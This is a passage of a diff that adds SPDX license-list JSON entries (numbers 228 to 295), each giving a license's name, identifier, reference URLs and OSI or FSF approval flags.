+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-only.json",
+      "referenceNumber": 228,
+      "name": "GNU Free Documentation License v1.2 only - invariants",
+      "licenseId": "GFDL-1.2-invariants-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.json",
+      "referenceNumber": 229,
+      "name": "GNU Free Documentation License v1.3 or later - no invariants",
+      "licenseId": "GFDL-1.3-no-invariants-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/fdl-1.3.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/curl.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/curl.json",
+      "referenceNumber": 230,
+      "name": "curl License",
+      "licenseId": "curl",
+      "seeAlso": [
+        "https://github.com/bagder/curl/blob/master/COPYING"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LAL-1.3.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LAL-1.3.json",
+      "referenceNumber": 231,
+      "name": "Licence Art Libre 1.3",
+      "licenseId": "LAL-1.3",
+      "seeAlso": [
+        "https://artlibre.org/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/DSDP.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/DSDP.json",
+      "referenceNumber": 232,
+      "name": "DSDP License",
+      "licenseId": "DSDP",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/DSDP"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CERN-OHL-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.2.json",
+      "referenceNumber": 233,
+      "name": "CERN Open Hardware Licence v1.2",
+      "licenseId": "CERN-OHL-1.2",
+      "seeAlso": [
+        "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.2"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/TOSL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TOSL.json",
+      "referenceNumber": 234,
+      "name": "Trusster Open Source License",
+      "licenseId": "TOSL",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/TOSL"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.json",
+      "referenceNumber": 235,
+      "name": "GNU General Public License v3.0 w/Autoconf exception",
+      "licenseId": "GPL-3.0-with-autoconf-exception",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/autoconf-exception-3.0.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0.json",
+      "referenceNumber": 236,
+      "name": "Creative Commons Attribution 3.0 Unported",
+      "licenseId": "CC-BY-3.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/3.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Qhull.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Qhull.json",
+      "referenceNumber": 237,
+      "name": "Qhull License",
+      "licenseId": "Qhull",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Qhull"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.json",
+      "referenceNumber": 238,
+      "name": "GNU Free Documentation License v1.3 only - no invariants",
+      "licenseId": "GFDL-1.3-no-invariants-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/fdl-1.3.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/TORQUE-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TORQUE-1.1.json",
+      "referenceNumber": 239,
+      "name": "TORQUE v2.5+ Software License v1.1",
+      "licenseId": "TORQUE-1.1",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/TORQUEv1.1"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MS-PL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MS-PL.json",
+      "referenceNumber": 240,
+      "name": "Microsoft Public License",
+      "licenseId": "MS-PL",
+      "seeAlso": [
+        "http://www.microsoft.com/opensource/licenses.mspx",
+        "https://opensource.org/licenses/MS-PL"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Apache-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Apache-1.0.json",
+      "referenceNumber": 241,
+      "name": "Apache License 1.0",
+      "licenseId": "Apache-1.0",
+      "seeAlso": [
+        "http://www.apache.org/licenses/LICENSE-1.0"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/copyleft-next-0.3.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.1.json",
+      "referenceNumber": 242,
+      "name": "copyleft-next 0.3.1",
+      "licenseId": "copyleft-next-0.3.1",
+      "seeAlso": [
+        "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.1"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.2-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-or-later.json",
+      "referenceNumber": 243,
+      "name": "GNU Free Documentation License v1.2 or later",
+      "licenseId": "GFDL-1.2-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-3.0+.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-3.0+.json",
+      "referenceNumber": 244,
+      "name": "GNU General Public License v3.0 or later",
+      "licenseId": "GPL-3.0+",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+        "https://opensource.org/licenses/GPL-3.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MulanPSL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MulanPSL-2.0.json",
+      "referenceNumber": 245,
+      "name": "Mulan Permissive Software License, Version 2",
+      "licenseId": "MulanPSL-2.0",
+      "seeAlso": [
+        "https://license.coscl.org.cn/MulanPSL2/"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/FSFAP.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/FSFAP.json",
+      "referenceNumber": 246,
+      "name": "FSF All Permissive License",
+      "licenseId": "FSFAP",
+      "seeAlso": [
+        "https://www.gnu.org/prep/maintain/html_node/License-Notices-for-Other-Files.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Xerox.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Xerox.json",
+      "referenceNumber": 247,
+      "name": "Xerox License",
+      "licenseId": "Xerox",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Xerox"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CDDL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CDDL-1.0.json",
+      "referenceNumber": 248,
+      "name": "Common Development and Distribution License 1.0",
+      "licenseId": "CDDL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/cddl1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-only.json",
+      "referenceNumber": 249,
+      "name": "GNU Free Documentation License v1.3 only - invariants",
+      "licenseId": "GFDL-1.3-invariants-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/fdl-1.3.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/etalab-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/etalab-2.0.json",
+      "referenceNumber": 250,
+      "name": "Etalab Open License 2.0",
+      "licenseId": "etalab-2.0",
+      "seeAlso": [
+        "https://github.com/DISIC/politique-de-contribution-open-source/blob/master/LICENSE.pdf",
+        "https://raw.githubusercontent.com/DISIC/politique-de-contribution-open-source/master/LICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/XFree86-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/XFree86-1.1.json",
+      "referenceNumber": 251,
+      "name": "XFree86 License 1.1",
+      "licenseId": "XFree86-1.1",
+      "seeAlso": [
+        "http://www.xfree86.org/current/LICENSE4.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/SNIA.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SNIA.json",
+      "referenceNumber": 252,
+      "name": "SNIA Public License 1.1",
+      "licenseId": "SNIA",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/SNIA_Public_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LPPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LPPL-1.1.json",
+      "referenceNumber": 253,
+      "name": "LaTeX Project Public License v1.1",
+      "licenseId": "LPPL-1.1",
+      "seeAlso": [
+        "http://www.latex-project.org/lppl/lppl-1-1.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CATOSL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CATOSL-1.1.json",
+      "referenceNumber": 254,
+      "name": "Computer Associates Trusted Open Source License 1.1",
+      "licenseId": "CATOSL-1.1",
+      "seeAlso": [
+        "https://opensource.org/licenses/CATOSL-1.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/TU-Berlin-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TU-Berlin-2.0.json",
+      "referenceNumber": 255,
+      "name": "Technische Universitaet Berlin License 2.0",
+      "licenseId": "TU-Berlin-2.0",
+      "seeAlso": [
+        "https://github.com/CorsixTH/deps/blob/fd339a9f526d1d9c9f01ccf39e438a015da50035/licences/libgsm.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.3.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.3.json",
+      "referenceNumber": 256,
+      "name": "GNU Free Documentation License v1.3",
+      "licenseId": "GFDL-1.3",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/fdl-1.3.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.3-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-or-later.json",
+      "referenceNumber": 257,
+      "name": "GNU Free Documentation License v1.3 or later",
+      "licenseId": "GFDL-1.3-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/fdl-1.3.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LAL-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LAL-1.2.json",
+      "referenceNumber": 258,
+      "name": "Licence Art Libre 1.2",
+      "licenseId": "LAL-1.2",
+      "seeAlso": [
+        "http://artlibre.org/licence/lal/licence-art-libre-12/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ICU.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ICU.json",
+      "referenceNumber": 259,
+      "name": "ICU License",
+      "licenseId": "ICU",
+      "seeAlso": [
+        "http://source.icu-project.org/repos/icu/icu/trunk/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/FTL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/FTL.json",
+      "referenceNumber": 260,
+      "name": "Freetype Project License",
+      "licenseId": "FTL",
+      "seeAlso": [
+        "http://freetype.fis.uniroma2.it/FTL.TXT",
+        "http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/docs/FTL.TXT",
+        "http://gitlab.freedesktop.org/freetype/freetype/-/raw/master/docs/FTL.TXT"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MirOS.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MirOS.json",
+      "referenceNumber": 261,
+      "name": "The MirOS Licence",
+      "licenseId": "MirOS",
+      "seeAlso": [
+        "https://opensource.org/licenses/MirOS"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.json",
+      "referenceNumber": 262,
+      "name": "BSD 2-Clause NetBSD License",
+      "licenseId": "BSD-2-Clause-NetBSD",
+      "seeAlso": [
+        "http://www.netbsd.org/about/redistribution.html#default"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.json",
+      "referenceNumber": 263,
+      "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Unported",
+      "licenseId": "CC-BY-NC-ND-3.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-nd/3.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OSET-PL-2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OSET-PL-2.1.json",
+      "referenceNumber": 264,
+      "name": "OSET Public License version 2.1",
+      "licenseId": "OSET-PL-2.1",
+      "seeAlso": [
+        "http://www.osetfoundation.org/public-license",
+        "https://opensource.org/licenses/OPL-2.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.json",
+      "referenceNumber": 265,
+      "name": "Creative Commons Attribution Non Commercial No Derivatives 2.0 Generic",
+      "licenseId": "CC-BY-NC-ND-2.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-nd/2.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SISSL-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SISSL-1.2.json",
+      "referenceNumber": 266,
+      "name": "Sun Industry Standards Source License v1.2",
+      "licenseId": "SISSL-1.2",
+      "seeAlso": [
+        "http://gridscheduler.sourceforge.net/Gridengine_SISSL_license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Wsuipa.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Wsuipa.json",
+      "referenceNumber": 267,
+      "name": "Wsuipa License",
+      "licenseId": "Wsuipa",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Wsuipa"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Zimbra-1.4.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Zimbra-1.4.json",
+      "referenceNumber": 268,
+      "name": "Zimbra Public License v1.4",
+      "licenseId": "Zimbra-1.4",
+      "seeAlso": [
+        "http://www.zimbra.com/legal/zimbra-public-license-1-4"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Linux-OpenIB.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Linux-OpenIB.json",
+      "referenceNumber": 269,
+      "name": "Linux Kernel Variant of OpenIB.org license",
+      "licenseId": "Linux-OpenIB",
+      "seeAlso": [
+        "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/drivers/infiniband/core/sa.h"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-3.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-3.0.json",
+      "referenceNumber": 270,
+      "name": "GNU Lesser General Public License v3.0 only",
+      "licenseId": "LGPL-3.0",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+        "https://opensource.org/licenses/LGPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.5.json",
+      "referenceNumber": 271,
+      "name": "Open LDAP Public License v2.5",
+      "licenseId": "OLDAP-2.5",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d6852b9d90022e8593c98205413380536b1b5a7cf"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AMPAS.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AMPAS.json",
+      "referenceNumber": 272,
+      "name": "Academy of Motion Picture Arts and Sciences BSD",
+      "licenseId": "AMPAS",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/BSD#AMPASBSD"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-1.0-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GPL-1.0-or-later.json",
+      "referenceNumber": 273,
+      "name": "GNU General Public License v1.0 or later",
+      "licenseId": "GPL-1.0-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BUSL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BUSL-1.1.json",
+      "referenceNumber": 274,
+      "name": "Business Source License 1.1",
+      "licenseId": "BUSL-1.1",
+      "seeAlso": [
+        "https://mariadb.com/bsl11/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Adobe-Glyph.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Adobe-Glyph.json",
+      "referenceNumber": 275,
+      "name": "Adobe Glyph List License",
+      "licenseId": "Adobe-Glyph",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/MIT#AdobeGlyph"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/0BSD.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/0BSD.json",
+      "referenceNumber": 276,
+      "name": "BSD Zero Clause License",
+      "licenseId": "0BSD",
+      "seeAlso": [
+        "http://landley.net/toybox/license.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/W3C-19980720.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/W3C-19980720.json",
+      "referenceNumber": 277,
+      "name": "W3C Software Notice and License (1998-07-20)",
+      "licenseId": "W3C-19980720",
+      "seeAlso": [
+        "http://www.w3.org/Consortium/Legal/copyright-software-19980720.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/FSFUL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/FSFUL.json",
+      "referenceNumber": 278,
+      "name": "FSF Unlimited License",
+      "licenseId": "FSFUL",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.json",
+      "referenceNumber": 279,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Unported",
+      "licenseId": "CC-BY-NC-SA-3.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/3.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/DOC.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/DOC.json",
+      "referenceNumber": 280,
+      "name": "DOC License",
+      "licenseId": "DOC",
+      "seeAlso": [
+        "http://www.cs.wustl.edu/~schmidt/ACE-copying.html",
+        "https://www.dre.vanderbilt.edu/~schmidt/ACE-copying.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/TMate.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TMate.json",
+      "referenceNumber": 281,
+      "name": "TMate Open Source License",
+      "licenseId": "TMate",
+      "seeAlso": [
+        "http://svnkit.com/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT-open-group.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT-open-group.json",
+      "referenceNumber": 282,
+      "name": "MIT Open Group variant",
+      "licenseId": "MIT-open-group",
+      "seeAlso": [
+        "https://gitlab.freedesktop.org/xorg/app/iceauth/-/blob/master/COPYING",
+        "https://gitlab.freedesktop.org/xorg/app/xvinfo/-/blob/master/COPYING",
+        "https://gitlab.freedesktop.org/xorg/app/xsetroot/-/blob/master/COPYING",
+        "https://gitlab.freedesktop.org/xorg/app/xauth/-/blob/master/COPYING"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AMDPLPA.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AMDPLPA.json",
+      "referenceNumber": 283,
+      "name": "AMD\u0027s plpa_map.c License",
+      "licenseId": "AMDPLPA",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/AMD_plpa_map_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Condor-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Condor-1.1.json",
+      "referenceNumber": 284,
+      "name": "Condor Public License v1.1",
+      "licenseId": "Condor-1.1",
+      "seeAlso": [
+        "http://research.cs.wisc.edu/condor/license.html#condor",
+        "http://web.archive.org/web/20111123062036/http://research.cs.wisc.edu/condor/license.html#condor"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.json",
+      "referenceNumber": 285,
+      "name": "PolyForm Noncommercial License 1.0.0",
+      "licenseId": "PolyForm-Noncommercial-1.0.0",
+      "seeAlso": [
+        "https://polyformproject.org/licenses/noncommercial/1.0.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.json",
+      "referenceNumber": 286,
+      "name": "BSD 3-Clause No Military License",
+      "licenseId": "BSD-3-Clause-No-Military-License",
+      "seeAlso": [
+        "https://gitlab.syncad.com/hive/dhive/-/blob/master/LICENSE",
+        "https://github.com/greymass/swift-eosio/blob/master/LICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-4.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-4.0.json",
+      "referenceNumber": 287,
+      "name": "Creative Commons Attribution 4.0 International",
+      "licenseId": "CC-BY-4.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/4.0/legalcode"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OGL-Canada-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OGL-Canada-2.0.json",
+      "referenceNumber": 288,
+      "name": "Open Government Licence - Canada",
+      "licenseId": "OGL-Canada-2.0",
+      "seeAlso": [
+        "https://open.canada.ca/en/open-government-licence-canada"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.json",
+      "referenceNumber": 289,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 IGO",
+      "licenseId": "CC-BY-NC-SA-3.0-IGO",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/3.0/igo/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/EFL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EFL-1.0.json",
+      "referenceNumber": 290,
+      "name": "Eiffel Forum License v1.0",
+      "licenseId": "EFL-1.0",
+      "seeAlso": [
+        "http://www.eiffel-nice.org/license/forum.txt",
+        "https://opensource.org/licenses/EFL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Newsletr.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Newsletr.json",
+      "referenceNumber": 291,
+      "name": "Newsletr License",
+      "licenseId": "Newsletr",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Newsletr"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/copyleft-next-0.3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.0.json",
+      "referenceNumber": 292,
+      "name": "copyleft-next 0.3.0",
+      "licenseId": "copyleft-next-0.3.0",
+      "seeAlso": [
+        "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-3.0-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GPL-3.0-or-later.json",
+      "referenceNumber": 293,
+      "name": "GNU General Public License v3.0 or later",
+      "licenseId": "GPL-3.0-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+        "https://opensource.org/licenses/GPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CDLA-Permissive-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-2.0.json",
+      "referenceNumber": 294,
+      "name": "Community Data License Agreement Permissive 2.0",
+      "licenseId": "CDLA-Permissive-2.0",
+      "seeAlso": [
+        "https://cdla.dev/permissive-2-0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-ND-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0.json",
+      "referenceNumber": 295,
+      "name": "Creative Commons Attribution No Derivatives 3.0 Unported",
